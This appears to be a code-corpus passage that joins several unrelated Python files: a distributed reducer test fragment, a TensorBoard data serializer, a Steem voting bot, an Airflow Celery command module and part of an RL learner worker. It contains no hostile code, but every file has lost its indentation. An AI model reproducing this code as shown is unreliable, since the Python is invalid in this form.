def _fn(rank: int, cross_rank: int, local_rank: int) -> None:
try:
results[rank] = fn(rank, cross_rank, local_rank)
except Exception:
errors[rank] = traceback.format_exc()
raise
threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank)))
# encourage allgather to occur in not-the-correct order to test the reordering
for thread in reversed(threads):
thread.start()
for thread in threads:
thread.join()
assert errors == [None] * size, "not all threads exited without error"
return results
def make_reducer_context(
rank: int, cross_rank: int, local_rank: int
) -> DummyDistributedReducerContext:
distributed_context = _core.DistributedContext(
rank=cross_rank * local_size + local_rank,
size=cross_size * local_size,
local_rank=local_rank,
local_size=local_size,
cross_rank=cross_rank,
cross_size=cross_size,
chief_ip="localhost",
force_tcp=False,
)
reducer_context = _PyTorchReducerContext(distributed_context._zmq_allgather)
# reducer_context.wrap_reducer(lambda x: x, "dummy")
wrapped_reducer = reducer_context.wrap_reducer(dummy_reducer)
return DummyDistributedReducerContext(distributed_context, reducer_context, wrapped_reducer)
trials = do_parallel(make_reducer_context)
def get_batch_list(
rank: int, batch_size: int, num_workers: int, seq: List[int]
) -> List[List[int]]:
total_batches = (len(seq) + (batch_size - 1)) // batch_size
my_batch_indices = [i for i in range(total_batches) if i % num_workers == rank]
all_batches = [
seq[batch_size * k : min(batch_size * k + batch_size, len(seq))]
for k in range(total_batches)
]
return [b for i, b in enumerate(all_batches) if i in my_batch_indices]
observations = list(range(dataset_size))
for rank, trial in enumerate(trials):
for batch in get_batch_list(rank, 2, len(trials), observations):
trial.wrapped_reducer.update(batch)
results = do_parallel(lambda rank, _, __: trials[rank].reducer_context.reduce_metrics(False))
logger.debug(results)
# Close all distributed contexts
for trial in trials:
trial.distributed_context.close()
for i, result in enumerate(results):
assert result["sum"] == dataset_size * (dataset_size - 1) // 2
assert all(
i == v for i, v in enumerate(result["values"])
), f"result[{i}]={result} is not in original order"
|
serialize_tensorboard.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Consume and serialize all of the data from a running TensorBoard instance.
This program connects to a live TensorBoard backend at given port, and saves
all of the data to local disk JSON in a predictable format.
This makes it easy to mock out the TensorBoard backend so that the frontend
may be tested in isolation.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import json
import os
import os.path
import shutil
import StringIO
import threading
import urllib
import six
from six.moves import http_client
import tensorflow as tf
from tensorflow.python.summary import event_multiplexer
from tensorflow.tensorboard.backend import server
tf.flags.DEFINE_string('logdir', None, """the logdir to pass to the TensorBoard
backend; data will be read from this logdir for serialization.""")
tf.flags.DEFINE_string('target', None, """The directoy where serialized data
will be written""")
tf.flags.DEFINE_boolean('overwrite', False, """Whether to remove and overwrite
TARGET if it already exists.""")
tf.flags.DEFINE_boolean(
'purge_orphaned_data', True, 'Whether to purge data that '
'may have been orphaned due to TensorBoard restarts. '
'Disabling purge_orphaned_data can be used to debug data '
'disappearance.')
FLAGS = tf.flags.FLAGS
BAD_CHARACTERS = "#%&{}\\/<>*? $!'\":@+`|="
DEFAULT_SUFFIX = '.json'
IMAGE_SUFFIX = '.png'
GRAPH_SUFFIX = '.pbtxt'
def Url(route, params):
"""Takes route and query params, and produce encoded url for that asset."""
out = route
if params:
# sorting ensures a unique filename for each query
sorted_params = sorted(six.iteritems(params))
out += '?' + urllib.urlencode(sorted_params)
return out
def Clean(s):
"""Clean a string so it can be used as a filepath."""
for c in BAD_CHARACTERS:
s = s.replace(c, '_')
return s
class TensorBoardStaticSerializer(object):
"""Serialize all the routes from a TensorBoard server to static json."""
def __init__(self, connection, target_path):
self.connection = connection
EnsureDirectoryExists(os.path.join(target_path, 'data'))
self.path = target_path
def GetAndSave(self, url, save_suffix, unzip=False):
"""GET the given url. Serialize the result at clean path version of url."""
self.connection.request('GET',
'/data/' + url,
headers={'content-type': 'text/plain'})
response = self.connection.getresponse()
destination = self.path + '/data/' + Clean(url) + save_suffix
if response.status != 200:
raise IOError(url)
if unzip:
s = StringIO.StringIO(response.read())
content = gzip.GzipFile(fileobj=s).read()
else:
content = response.read()
with open(destination, 'w') as f:
f.write(content)
return content
def GetRouteAndSave(self, route, params=None):
"""GET given route and params. Serialize the result. Return as JSON."""
url = Url(route, params)
return json.loads(self.GetAndSave(url, DEFAULT_SUFFIX))
def Run(self):
"""Serialize everything from a TensorBoard backend."""
# get the runs object, which is an index for every tag.
runs = self.GetRouteAndSave('runs')
# collect sampled data.
self.GetRouteAndSave('scalars')
# now let's just download everything!
for run, tag_type_to_tags in six.iteritems(runs):
for tag_type, tags in six.iteritems(tag_type_to_tags):
try:
if tag_type == 'graph':
# in this case, tags is a bool which specifies if graph is present.
if tags:
url = Url('graph', {'run': run})
self.GetAndSave(url, GRAPH_SUFFIX, unzip=True)
elif tag_type == 'images':
for t in tags:
images = self.GetRouteAndSave('images', {'run': run, 'tag': t})
for im in images:
url = 'individualImage?' + im['query']
# pull down the images themselves.
self.GetAndSave(url, IMAGE_SUFFIX)
else:
for t in tags:
# Save this, whatever it is :)
self.GetRouteAndSave(tag_type, {'run': run, 'tag': t})
except IOError as e:
PrintAndLog('Retrieval failed for %s/%s/%s' % (tag_type, run, tags),
tf.logging.WARN)
PrintAndLog('Got Exception: %s' % e, tf.logging.WARN)
PrintAndLog('continuing...', tf.logging.WARN)
continue
def EnsureDirectoryExists(path):
if not os.path.exists(path):
os.makedirs(path)
def PrintAndLog(msg, lvl=tf.logging.INFO):
tf.logging.log(lvl, msg)
print(msg)
def main(unused_argv=None):
target = FLAGS.target
logdir = FLAGS.logdir
if not target or not logdir:
PrintAndLog('Both --target and --logdir are required.', tf.logging.ERROR)
return -1
if os.path.exists(target):
if FLAGS.overwrite:
if os.path.isdir(target):
shutil.rmtree(target)
else:
os.remove(target)
else:
PrintAndLog('Refusing to overwrite target %s without --overwrite' %
target, tf.logging.ERROR)
return -2
path_to_run = server.ParseEventFilesSpec(FLAGS.logdir)
PrintAndLog('About to load Multiplexer. This may take some time.')
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=server.TENSORBOARD_SIZE_GUIDANCE,
purge_orphaned_data=FLAGS.purge_orphaned_data)
server.ReloadMultiplexer(multiplexer, path_to_run)
PrintAndLog('Multiplexer load finished. Starting TensorBoard server.')
s = server.BuildServer(multiplexer, 'localhost', 0)
server_thread = threading.Thread(target=s.serve_forever)
server_thread.daemon = True
server_thread.start()
connection = http_client.HTTPConnection('localhost', s.server_address[1])
PrintAndLog('Server setup! Downloading data from the server.')
x = TensorBoardStaticSerializer(connection, target)
x.Run()
PrintAndLog('Done downloading data.')
connection.close()
s.shutdown()
s.server_close()
if __name__ == '__main__':
tf.app.run()
|
bot.py
|
# -*- coding:utf-8 -*-
from utils.logging.logger import logger
import os
import time
import random
import traceback
from threading import Thread, Timer
from beem.comment import Comment
from steem.settings import settings
from steem.comment import SteemComment
from steem.account import SteemAccount
from steem.writer import Writer
from steem.voter import Voter
from steem.uploader import Uploader
from steem.stream import SteemStream
from steem.collector import query
MINIMUM_VOTE_INTERVAL = 3 # seconds
VOTE_RETRIES = 5
class VoteBot:
def __init__(self, author, mode="stream.comment", config={}):
self.author = author
self.writer = Writer(author=self.author)
self.voter = Voter(author=self.author)
self.uploader = Uploader(author=self.author)
self.mode = mode
self.config = config
# the configuration functions for a vote bot
self.what_to_vote = None
self.who_to_vote = lambda : True
self.when_to_vote = lambda : 15
self.how_to_vote = lambda : 50
self.is_ready = lambda: True
self.after_success = lambda : True
self.last_vote_timestamp = -1
self._vote_queue = []
def _has_reply_comment(self, receiver, message_id):
comments = self._read_comments()
for c in comments:
# check the receiver and the message_id fingerprint
if c.parent_author == receiver and verify_message(message_id, c.body):
logger.info("I found I replied to @{} with message [{}] by searching comment history".format(receiver, message_id))
return (True, c)
return (False, None)
def _has_replied(self, receiver, message_id):
# has reply records in DB, or has replied by checking steem APIs
if self._has_reply_record(receiver, message_id):
return True
(replied, comment) = self._has_reply_comment(receiver, message_id)
if replied:
c = SteemComment(comment=comment.get_parent())
# cache the record into database since not found
self._add_reply_record(receiver, message_id, c, comment["created"])
return True
return False
def _get_reply_body(self, message_id, author):
account = SteemAccount(author)
comments_num = account.remaining_comments() or ''
daily_comments_num = round(account.daily_recovery_comments(), 1) or ''
return get_message(message_id).format(name=author, comments_num=comments_num, daily_comments_num=daily_comments_num)
def reply(self, message_id, post=None, url=None):
""" reply to the newbies' post """
c = SteemComment(comment=post, url=url)
receiver = c.get_comment().author
if not self._has_replied(receiver, message_id):
title = c.get_comment().title
message = self._get_reply_body(message_id, receiver)
self.writer.reply(c.get_comment(), message)
self._add_reply_record(receiver, message_id, c)
logger.info("Replied to @{}'s post [{}] with [{}] message".format(receiver, title, message_id))
return True
else:
logger.info("Skip reply account @{} with [{}] message, because we already reliped before".format(receiver, message_id))
return False
def vote(self, post=None, url=None, weight=None, retries=VOTE_RETRIES):
c = SteemComment(comment=post, url=url)
if retries <= 0:
logger.error("Vote {} failed after retries for {} times".format(c.get_url(), VOTE_RETRIES))
return False
while time.time() - self.last_vote_timestamp < MINIMUM_VOTE_INTERVAL:
wait_time = round(MINIMUM_VOTE_INTERVAL + random.random() * MINIMUM_VOTE_INTERVAL * 0.2, 2)
logger.info("Sleep {} seconds to avoid voting too frequently.".format(wait_time))
time.sleep(wait_time)
if time.time() - self.last_vote_timestamp >= MINIMUM_VOTE_INTERVAL:
return self.vote(post, url, weight, retries-1)
success = False
try:
weight = weight or self.weight(c)
success = self.voter.vote(c.get_comment(), weight=weight)
self.last_vote_timestamp = time.time()
except:
logger.error("Failed when voting {} with error: {} . {} retry times left.".format(c.get_url(), traceback.format_exc(), retries-1))
return self.vote(post, url, weight, retries-1)
self.after_success(success)
return success
def start_vote_queue(self):
logger.info("Start Vote Queue...")
def wait_for_vote():
while True:
while(len(self._vote_queue) > 0):
post = self._vote_queue.pop(0)
self.vote(post)
time.sleep(1)
logger.info("Vote Queue Stopped.")
Thread(target=wait_for_vote).start()
def append_to_vote_queue(self, post):
self._vote_queue.append(post)
def what(self, what_to_vote):
""" define the condition of vote for a post """
self.what_to_vote = what_to_vote
return self
def when(self, when_to_vote):
""" define the timing of vote for a post """
self.when_to_vote = when_to_vote
return self
def who(self, who_to_vote):
""" define when to vote the post """
self.who_to_vote = who_to_vote
return self
def how(self, how_to_vote):
""" define the weight of vote the post """
self.how_to_vote = how_to_vote
return self
def ready(self, is_ready):
""" define voter has met energy or other requirements """
self.is_ready = is_ready
return self
def done(self, after_success):
""" define the callback after vote is completed successfully """
self.after_success = after_success
return self
def context(self, ctx):
self.ctx = ctx
return self
def weight(self, post):
return self.how_to_vote(post)
def watch(self, ops):
author = ops['author']
def perform_vote():
if isinstance(ops, Comment):
c = SteemComment(comment=ops)
else:
c = SteemComment(ops=ops)
self.append_to_vote_queue(post=c.get_comment())
self.ctx(ops)
if self.what_to_vote(ops) and self.who_to_vote(author) and self.is_ready():
delay = self.when_to_vote(ops) # mins
if delay is not None and delay > 0:
secs = 60.0 * delay
logger.info("I'll vote after {} seconds".format(secs))
t = Timer(secs, perform_vote)
t.start()
else:
logger.info("I'll vote immediately")
perform_vote()
def run(self):
self.start_vote_queue()
if self.mode.startswith("stream."):
if self.mode == "stream.comment":
stream = SteemStream(operations=["comment"])
elif self.mode == "stream.vote":
stream = SteemStream(operations=["vote"])
stream.run(callback=self.watch)
elif self.mode.startswith("query."):
if self.mode == "query.comment.post":
self.config['mode'] = "post"
elif self.mode == "query.comment.comment":
self.config['mode'] = "comment"
elif self.mode == "query.comment.all":
self.config['mode'] = "post+comment"
for c in query(self.config):
self.watch(c)
|
celery_command.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Celery command"""
from multiprocessing import Process
from typing import Optional
import daemon
import psutil
import sqlalchemy.exc
from celery import maybe_patch_concurrency
from daemon.pidfile import TimeoutPIDLockFile
from lockfile.pidlockfile import read_pid_from_pidfile, remove_existing_pidfile
from airflow import settings
from airflow.configuration import conf
from airflow.executors.celery_executor import app as celery_app
from airflow.utils import cli as cli_utils
from airflow.utils.cli import setup_locations, setup_logging
from airflow.utils.serve_logs import serve_logs
WORKER_PROCESS_NAME = "worker"
@cli_utils.action_cli
def flower(args):
"""Starts Flower, Celery monitoring tool"""
options = [
"flower",
conf.get('celery', 'BROKER_URL'),
f"--address={args.hostname}",
f"--port={args.port}",
]
if args.broker_api:
options.append(f"--broker-api={args.broker_api}")
if args.url_prefix:
options.append(f"--url-prefix={args.url_prefix}")
if args.basic_auth:
options.append(f"--basic-auth={args.basic_auth}")
if args.flower_conf:
options.append(f"--conf={args.flower_conf}")
if args.daemon:
pidfile, stdout, stderr, _ = setup_locations(
process="flower",
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
with open(stdout, "w+") as stdout, open(stderr, "w+") as stderr:
ctx = daemon.DaemonContext(
pidfile=TimeoutPIDLockFile(pidfile, -1),
stdout=stdout,
stderr=stderr,
)
with ctx:
celery_app.start(options)
else:
celery_app.start(options)
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
def _run_worker(options, skip_serve_logs):
sub_proc = _serve_logs(skip_serve_logs)
try:
celery_app.worker_main(options)
finally:
if sub_proc:
sub_proc.terminate()
@cli_utils.action_cli
def worker(args):
"""Starts Airflow Celery worker"""
if not settings.validate_session():
raise SystemExit("Worker exiting, database connection precheck failed.")
autoscale = args.autoscale
skip_serve_logs = args.skip_serve_logs
if autoscale is None and conf.has_option("celery", "worker_autoscale"):
autoscale = conf.get("celery", "worker_autoscale")
# Setup locations
pid_file_path, stdout, stderr, log_file = setup_locations(
process=WORKER_PROCESS_NAME,
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
if hasattr(celery_app.backend, 'ResultSession'):
# Pre-create the database tables now, otherwise SQLA via Celery has a
# race condition where one of the subprocesses can die with "Table
# already exists" error, because SQLA checks for which tables exist,
# then issues a CREATE TABLE, rather than doing CREATE TABLE IF NOT
# EXISTS
try:
session = celery_app.backend.ResultSession()
session.close()
except sqlalchemy.exc.IntegrityError:
# At least on postgres, trying to create a table that already exist
# gives a unique constraint violation or the
# "pg_type_typname_nsp_index" table. If this happens we can ignore
# it, we raced to create the tables and lost.
pass
# Setup Celery worker
options = [
'worker',
'-O',
'fair',
'--queues',
args.queues,
'--concurrency',
args.concurrency,
'--hostname',
args.celery_hostname,
'--loglevel',
conf.get('logging', 'LOGGING_LEVEL'),
'--pidfile',
pid_file_path,
]
if autoscale:
options.extend(['--autoscale', autoscale])
if args.without_mingle:
options.append('--without-mingle')
if args.without_gossip:
options.append('--without-gossip')
if conf.has_option("celery", "pool"):
pool = conf.get("celery", "pool")
options.extend(["--pool", pool])
# Celery pools of type eventlet and gevent use greenlets, which
# requires monkey patching the app:
# https://eventlet.net/doc/patching.html#monkey-patch
# Otherwise task instances hang on the workers and are never
# executed.
maybe_patch_concurrency(['-P', pool])
if args.daemon:
# Run Celery worker as daemon
handle = setup_logging(log_file)
with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
if args.umask:
umask = args.umask
ctx = daemon.DaemonContext(
files_preserve=[handle],
umask=int(umask, 8),
stdout=stdout_handle,
stderr=stderr_handle,
)
with ctx:
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
else:
# Run Celery worker in the same process
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
@cli_utils.action_cli
def stop_worker(args):
"""Sends SIGTERM to Celery worker"""
# Read PID from file
if args.pid:
pid_file_path = args.pid
else:
pid_file_path, _, _, _ = setup_locations(process=WORKER_PROCESS_NAME)
pid = read_pid_from_pidfile(pid_file_path)
# Send SIGTERM
if pid:
worker_process = psutil.Process(pid)
worker_process.terminate()
# Remove pid file
remove_existing_pidfile(pid_file_path)
|
learner.py
|
from typing import Tuple
import glob
import os
import shutil
import signal
import threading
import time
from collections import OrderedDict, deque
from os.path import join
from queue import Empty, Queue, Full
from threading import Thread
import numpy as np
import psutil
import torch
from torch.nn.utils.rnn import PackedSequence, invert_permutation
from torch.multiprocessing import Process, Event as MultiprocessingEvent
if os.name == 'nt':
from utils.faster_fifo_stub import Queue as MpQueue
else:
from faster_fifo import Queue as MpQueue
from algorithms.appooc.appooc_utils import TaskType, list_of_dicts_to_dict_of_lists, memory_stats, cuda_envvars_for_policy, \
TensorBatcher, iter_dicts_recursively, copy_dict_structure, ObjectPool
from algorithms.appooc.model import CPCA, create_actor_critic
from algorithms.appooc.population_based_training import PbtTask
from algorithms.utils.action_distributions import get_action_distribution, is_continuous_action_space
from algorithms.utils.algo_utils import calculate_gae, EPS
from algorithms.utils.pytorch_utils import to_scalar
from algorithms.utils.action_distributions import calc_num_logits, calc_num_actions
from utils.decay import LinearDecay
from utils.timing import Timing
from utils.utils import log, AttrDict, experiment_dir, ensure_dir_exists, join_or_kill, safe_get, safe_put
# noinspection PyPep8Naming
def _build_pack_info_from_dones(
dones: torch.Tensor,
T: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
"""
Create the indexing info needed to make the PackedSequence based on the dones.
PackedSequences are PyTorch's way of supporting a single RNN forward
call where each input in the batch can have an arbitrary sequence length
They work as follows: Given the sequences [c], [x, y, z], [a, b],
we generate data [x, a, c, y, b, z] and batch_sizes [3, 2, 1]. The
data is a flattened out version of the input sequences (the ordering in
data is determined by sequence length). batch_sizes tells you that
for each index, how many sequences have a length of (index + 1) or greater.
This method will generate the new index ordering such that you can
construct the data for a PackedSequence from a (N*T, ...) tensor
via x.index_select(0, select_inds)
"""
num_samples = len(dones)
rollout_boundaries = dones.clone().detach()
rollout_boundaries[T - 1::T] = 1 # end of each rollout is the boundary
rollout_boundaries = rollout_boundaries.nonzero().squeeze(dim=1) + 1
first_len = rollout_boundaries[0].unsqueeze(0)
if len(rollout_boundaries) <= 1:
log.debug(
'Only one rollout boundary. This can happen if batch size is 1, probably not during the real training.'
)
rollout_lengths = first_len
else:
rollout_lengths = rollout_boundaries[1:] - rollout_boundaries[:-1]
rollout_lengths = torch.cat([first_len, rollout_lengths])
rollout_starts_orig = rollout_boundaries - rollout_lengths
# done=True for the last step in the episode, so done flags rolled 1 step to the right will indicate
# first frames in the episodes
is_new_episode = dones.clone().detach().view((-1, T))
is_new_episode = is_new_episode.roll(1, 1)
# roll() is cyclical, so done=True in the last position in the rollout will roll to 0th position
# we want to avoid it here. (note to self: is there a function that does two of these things at once?)
is_new_episode[:, 0] = 0
is_new_episode = is_new_episode.view((-1,))
lengths, sorted_indices = torch.sort(rollout_lengths, descending=True)
# We will want these on the CPU for torch.unique_consecutive,
# so move now.
cpu_lengths = lengths.to(device='cpu', non_blocking=True)
# We need to keep the original unpermuted rollout_starts, because the permutation is later applied
# internally in the RNN implementation.
# From modules/rnn.py:
# Each batch of the hidden state should match the input sequence that
# the user believes he/she is passing in.
# hx = self.permute_hidden(hx, sorted_indices)
rollout_starts_sorted = rollout_starts_orig.index_select(0, sorted_indices)
select_inds = torch.empty(num_samples, device=dones.device, dtype=torch.int64)
max_length = int(cpu_lengths[0].item())
# batch_sizes is *always* on the CPU
batch_sizes = torch.empty((max_length,), device='cpu', dtype=torch.int64)
offset = 0
prev_len = 0
num_valid_for_length = lengths.size(0)
unique_lengths = torch.unique_consecutive(cpu_lengths)
# Iterate over all unique lengths in reverse as they sorted
# in decreasing order
for i in range(len(unique_lengths) - 1, -1, -1):
valids = lengths[0:num_valid_for_length] > prev_len
num_valid_for_length = int(valids.float().sum().item())
next_len = int(unique_lengths[i])
batch_sizes[prev_len:next_len] = num_valid_for_length
new_inds = (rollout_starts_sorted[0:num_valid_for_length].view(1, num_valid_for_length) +
torch.arange(prev_len, next_len, device=rollout_starts_sorted.device).view(
next_len - prev_len, 1)).view(-1)
# for a set of sequences [1, 2, 3], [4, 5], [6, 7], [8]
# these indices will be 1,4,6,8,2,5,7,3
# (all first steps in all trajectories, then all second steps, etc.)
select_inds[offset:offset + new_inds.numel()] = new_inds
offset += new_inds.numel()
prev_len = next_len
# Make sure we have an index for all elements
assert offset == num_samples
assert is_new_episode.shape[0] == num_samples
return rollout_starts_orig, is_new_episode, select_inds, batch_sizes, sorted_indices
def build_rnn_inputs(x, dones_cpu, rnn_states, T: int):
"""
Create a PackedSequence input for an RNN such that each
set of steps that are part of the same episode are all part of
a batch in the PackedSequence.
Use the returned select_inds and build_core_out_from_seq to invert this.
:param x: A (N*T, -1) tensor of the data to build the PackedSequence out of
:param dones_cpu: A (N*T) tensor where dones[i] == 1.0 indicates an episode is done, a CPU-bound tensor
:param rnn_states: A (N*T, -1) tensor of the rnn_hidden_states
:param T: The length of the rollout
:return: tuple(x_seq, rnn_states, select_inds)
WHERE
x_seq is the PackedSequence version of x to pass to the RNN
rnn_states are the corresponding rnn state, zeroed on the episode boundary
inverted_select_inds can be passed to build_core_out_from_seq so the RNN output can be retrieved
"""
rollout_starts, is_new_episode, select_inds, batch_sizes, sorted_indices = _build_pack_info_from_dones(dones_cpu, T)
inverted_select_inds = invert_permutation(select_inds)
def device(t):
return t.to(device=x.device)
select_inds = device(select_inds)
inverted_select_inds = device(inverted_select_inds)
sorted_indices = device(sorted_indices)
rollout_starts = device(rollout_starts)
is_new_episode = device(is_new_episode)
x_seq = PackedSequence(x.index_select(0, select_inds), batch_sizes, sorted_indices)
# We zero-out rnn states for timesteps at the beginning of the episode.
# rollout_starts are indices of all starts of sequences
# (which can be due to episode boundary or just boundary of a rollout)
# (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts) gives us a zero for every beginning of
# the sequence that is actually also a start of a new episode, and by multiplying this RNN state by zero
# we ensure no information transfer across episode boundaries.
rnn_states = rnn_states.index_select(0, rollout_starts)
is_same_episode = (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts)
rnn_states = rnn_states * is_same_episode
return x_seq, rnn_states, inverted_select_inds
def build_core_out_from_seq(x_seq: PackedSequence, inverted_select_inds):
return x_seq.data.index_select(0, inverted_select_inds)
class LearnerWorker:
def __init__(
self,
worker_idx,
policy_id,
cfg,
obs_space,
action_space,
report_queue,
policy_worker_queues,
shared_buffers,
policy_lock,
resume_experience_collection_cv,
):
log.info('Initializing the learner %d for policy %d', worker_idx, policy_id)
self.worker_idx = worker_idx
self.policy_id = policy_id
self.cfg = cfg
# PBT-related stuff
self.should_save_model = True # set to true if we need to save the model to disk on the next training iteration
self.load_policy_id = None # non-None when we need to replace our parameters with another policy's parameters
self.pbt_mutex = threading.Lock()
self.new_cfg = None # non-None when we need to update the learning hyperparameters
self.terminate = False
self.num_batches_processed = 0
self.obs_space = obs_space
self.action_space = action_space
self.num_actions = calc_num_actions(action_space)
self.num_action_logits = calc_num_logits(action_space)
self.rollout_tensors = shared_buffers.tensor_trajectories
self.traj_tensors_available = shared_buffers.is_traj_tensor_available
self.policy_versions = shared_buffers.policy_versions
self.stop_experience_collection = shared_buffers.stop_experience_collection
self.shared_buffers = shared_buffers
self.stop_experience_collection_num_msgs = self.resume_experience_collection_num_msgs = 0
self.device = None
self.actor_critic = None
self.aux_loss_module = None
self.optimizer = None
self.policy_lock = policy_lock
self.resume_experience_collection_cv = resume_experience_collection_cv
self.task_queue = MpQueue()
self.report_queue = report_queue
self.initialized_event = MultiprocessingEvent()
self.initialized_event.clear()
self.model_saved_event = MultiprocessingEvent()
self.model_saved_event.clear()
# queues corresponding to policy workers using the same policy
# we send weight updates via these queues
self.policy_worker_queues = policy_worker_queues
self.experience_buffer_queue = Queue()
self.tensor_batch_pool = ObjectPool()
self.tensor_batcher = TensorBatcher(self.tensor_batch_pool)
self.with_training = True # set to False for debugging no-training regime
self.train_in_background = self.cfg.train_in_background_thread # set to False for debugging
self.training_thread = Thread(target=self._train_loop) if self.train_in_background else None
self.train_thread_initialized = threading.Event()
self.is_training = False
self.train_step = self.env_steps = 0
# decay rate at which summaries are collected
# save summaries every 20 seconds in the beginning, but decay to every 4 minutes in the limit, because we
# do not need frequent summaries for longer experiments
self.summary_rate_decay_seconds = LinearDecay([(0, 20), (100000, 120), (1000000, 240)])
self.last_summary_time = 0
self.last_saved_time = self.last_milestone_time = 0
self.discarded_experience_over_time = deque([], maxlen=30)
self.discarded_experience_timer = time.time()
self.num_discarded_rollouts = 0
self.process = Process(target=self._run, daemon=True)
if is_continuous_action_space(
self.action_space) and self.cfg.exploration_loss == 'symmetric_kl':
raise NotImplementedError('KL-divergence exploration loss is not supported with '
'continuous action spaces. Use entropy exploration loss')
if self.cfg.exploration_loss_coeff == 0.0:
self.exploration_loss_func = lambda action_distr, option_idx: 0.0
elif self.cfg.exploration_loss == 'entropy':
self.exploration_loss_func = self.entropy_exploration_loss
elif self.cfg.exploration_loss == 'symmetric_kl':
self.exploration_loss_func = self.symmetric_kl_exploration_loss
else:
raise NotImplementedError(f'{self.cfg.exploration_loss} not supported!')
def start_process(self):
self.process.start()
def _init(self):
log.info('Waiting for the learner to initialize...')
self.train_thread_initialized.wait()
log.info('Learner %d initialized', self.worker_idx)
self.initialized_event.set()
def _terminate(self):
self.terminate = True
def _broadcast_model_weights(self):
state_dict = self.actor_critic.state_dict()
policy_version = self.train_step
log.debug('Broadcast model weights for model version %d', policy_version)
model_state = (policy_version, state_dict)
for q in self.policy_worker_queues:
q.put((TaskType.INIT_MODEL, model_state))
def _calculate_gae(self, buffer):
"""
Calculate advantages using Generalized Advantage Estimation.
This is leftover the from previous version of the algorithm.
Perhaps should be re-implemented in PyTorch tensors, similar to V-trace for uniformity.
"""
rewards = torch.stack(buffer.rewards).numpy().squeeze() # [E, T]
dones = torch.stack(buffer.dones).numpy().squeeze() # [E, T]
values_arr = torch.stack(buffer.values).numpy().squeeze() # [E, T]
# calculating fake values for the last step in the rollout
# this will make sure that advantage of the very last action is always zero
values = []
for i in range(len(values_arr)):
last_value, last_reward = values_arr[i][-1], rewards[i, -1]
next_value = (last_value - last_reward) / self.cfg.gamma
values.append(list(values_arr[i]))
values[i].append(float(next_value)) # [T] -> [T+1]
# calculating returns and GAE
rewards = rewards.transpose((1, 0)) # [E, T] -> [T, E]
dones = dones.transpose((1, 0)) # [E, T] -> [T, E]
values = np.asarray(values).transpose((1, 0)) # [E, T+1] -> [T+1, E]
advantages, returns = calculate_gae(rewards, dones, values, self.cfg.gamma, self.cfg.gae_lambda)
# transpose tensors back to [E, T] before creating a single experience buffer
buffer.advantages = advantages.transpose((1, 0)) # [T, E] -> [E, T]
buffer.returns = returns.transpose((1, 0)) # [T, E] -> [E, T]
buffer.returns = buffer.returns[:, :, np.newaxis] # [E, T] -> [E, T, 1]
buffer.advantages = [torch.tensor(buffer.advantages).reshape(-1)]
buffer.returns = [torch.tensor(buffer.returns).reshape(-1)]
return buffer
def _mark_rollout_buffer_free(self, rollout):
r = rollout
self.traj_tensors_available[r.worker_idx, r.split_idx][r.env_idx,
r.agent_idx,
r.traj_buffer_idx] = 1
def _index_values_in_buffer(self, buffer):
for rollout_idx in range(len(buffer.values)):
values, option_idx = buffer.values[rollout_idx], buffer.option_idx[rollout_idx]
buffer.values[rollout_idx] = self._index_via_option_idx_in_rollout(values, option_idx)
def _index_via_option_idx_in_rollout(self, tensor, option_idx):
assert tensor.shape[1] == self.cfg.num_options, "Must pass in B x num_options to index with option_idx"
assert tensor.shape[0] == option_idx.shape[0], "Must have same B (batch) dim"
assert option_idx.shape[1] == 1
assert len(option_idx.shape) == 2
idx = option_idx.reshape(option_idx.shape + (1,) * len(tensor.shape[2:]))
idx = idx.expand((tensor.shape[0], -1) +
tensor.shape[2:]).long() # B x 1 x <E> where shape of tensor (B x O x <E>)
return torch.gather(tensor, 1, idx).squeeze() # B x 1 x <E>
def _prepare_train_buffer(self, rollouts, macro_batch_size, timing):
trajectories = [AttrDict(r['t']) for r in rollouts]
with timing.add_time('buffers'):
buffer = AttrDict()
# by the end of this loop the buffer is a dictionary containing lists of numpy arrays
for i, t in enumerate(trajectories):
for key, x in t.items():
if key not in buffer:
buffer[key] = []
buffer[key].append(x)
# convert lists of dict observations to a single dictionary of lists
for key, x in buffer.items():
if isinstance(x[0], (dict, OrderedDict)):
buffer[key] = list_of_dicts_to_dict_of_lists(x)
if not self.cfg.with_vtrace:
with timing.add_time('calc_gae'):
self._index_values_in_buffer(buffer)
buffer = self._calculate_gae(buffer)
with timing.add_time('batching'):
# concatenate rollouts from different workers into a single batch efficiently
# that is, if we already have memory for the buffers allocated, we can just copy the data into
# existing cached tensors instead of creating new ones. This is a performance optimization.
use_pinned_memory = self.cfg.device == 'gpu'
buffer = self.tensor_batcher.cat(buffer, macro_batch_size, use_pinned_memory, timing)
with timing.add_time('buff_ready'):
for r in rollouts:
self._mark_rollout_buffer_free(r)
with timing.add_time('tensors_gpu_float'):
